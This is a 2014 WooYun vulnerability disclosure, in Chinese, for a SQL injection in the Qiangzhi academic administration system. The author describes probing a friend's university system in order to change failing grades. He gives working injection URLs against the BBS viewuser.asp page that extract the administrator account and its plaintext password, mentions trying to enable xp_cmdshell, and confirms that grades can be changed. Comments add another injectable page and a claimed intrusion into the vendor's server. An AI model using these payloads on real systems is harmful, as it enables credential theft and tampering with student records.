强智科技教务管理系统注入漏洞可改成绩

漏洞概要

缺陷编号:WooYun-2014-011355

漏洞标题:强智科技教务管理系统注入漏洞可改成绩

相关厂商:qzdatasoft.com

漏洞作者:小屁孩

提交时间:2014-03-30 12:40

公开时间:2014-03-31 13:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签:

漏洞详情

披露状态:

2014-03-30: 细节已通知厂商并且等待厂商处理中
2014-03-30: 厂商已查看当前漏洞内容,细节仅向厂商公开
2014-03-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

昨天无聊就去一个朋友的大学的教务处看了看。心想说不定能帮他改改挂科成绩

详细说明:

看了一下是一个叫强智科技教务管理系统google发现爆出过漏洞 登录框POST注入。。 Mssql数据库我试了试 不知道是哪里的问题 换了好几个工具 都读不出表名 显示的是sa 但是恢复xp_cmdshell 失败 执行命令失败无奈放到Jsky里去扫 惊喜的发现有网站源码 下载下来发现教务管理系统有一个很鸡肋的BBS 基本上没人登录 BBS的管理员密码默认就是教务管理员密码 但存在另一个表单里 明文显示这下爽了先去论坛注册一个用户然后直接手工注入爆管理员账号密码顺利进入后台真的能改成绩把这个漏洞爆出来吧在这个位置/JwGl/bbs/default.asp 先去注册http://**.**.**.**/JwGl/bbs/viewuser.asp?name=sudo(sudo改成你注册的用户名)http://**.**.**.**/JwGl/bbs/viewuser.asp?name=sudo'and%201=convert(int,(select%20top%201%20SFAdmin_Account%20from%20SFadmin))--获得管理员账号http://**.**.**.**/JwGl/bbs/viewuser.asp?name=sudo'and%201=convert(int,(select%20top%201%20SFAdmin_Password%20from%20SFadmin))-- 获得管理员密码登陆界面:http://**.**.**.**/JwGl/

漏洞证明:

修复方案:

牛人多

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-03-3113:38

厂商回复:

这漏洞修复很久很久了……真不知道这些学校怎么还不升级

漏洞Rank:11 (WooYun评价)

最新状态:

暂无

评价

  1. 2010-01-01 00:00 winston 白帽子 | Rank:46 漏洞数:7)

    不知道是不是版本的问题啊,我这里的教务网站是可以注入的。它有一个http://www.xxx.edu.cn/Public/ShowGGTZ.asp?GGTZID=626.是一个公告类的页面,使用工具也好,手工也好都是可以注入的。这个网站的默认数据库是MSSQL的。楼主说明的那个默认的用户名和表名一般的情况是无法进入管理的!

  2. 2010-01-01 00:00 乌帽子 白帽子 | Rank:28 漏洞数:2)

    原来你就是sudo

  3. 2010-01-01 00:00 U神 白帽子 | Rank:788 漏洞数:65)

    终于知道为什么不能上北大了~原来是你!!!!

  4. 2010-01-01 00:00 野驴~ 白帽子 | Rank:5 漏洞数:2)

    我什么我总看成“弱智”教务管理系统,楼下,你有同感吗?

  5. 2010-01-01 00:00 Knight 白帽子 | Rank:18 漏洞数:4)

    这漏洞修复很久很久了……真不知道这些学校怎么还不升级。

  6. 2010-01-01 00:00 Mr.leo 白帽子 | Rank:932 漏洞数:80)

    标题似曾相识的感觉。。。。。。。。

  7. 2010-01-01 00:00 YangCL 白帽子 | Rank:1 漏洞数:2)

    @winston 最新版本已经修复了、

  8. 2010-01-01 00:00 存在敏感词 白帽子 | Rank:61 漏洞数:5)

    真是蛋疼,这漏洞是我发在一个论坛上的,被人盗转了过来 去年的事 现在那人号都被删了 厂商怎么才看到。。。

  9. 2010-01-01 00:00 warrioj4 白帽子 | Rank:0 漏洞数:0)

    @存在敏感词 我进过他们官网服务器(发现全部源码都已经被压缩拷贝过了),╮(╯▽╰)╭ 貌似新版的JAVA系统又爆出洞洞了,不过现在还没有高人公布啊

  10. 2010-01-01 00:00 Knight 白帽子 | Rank:18 漏洞数:4)

    厂商居然盗我的回复……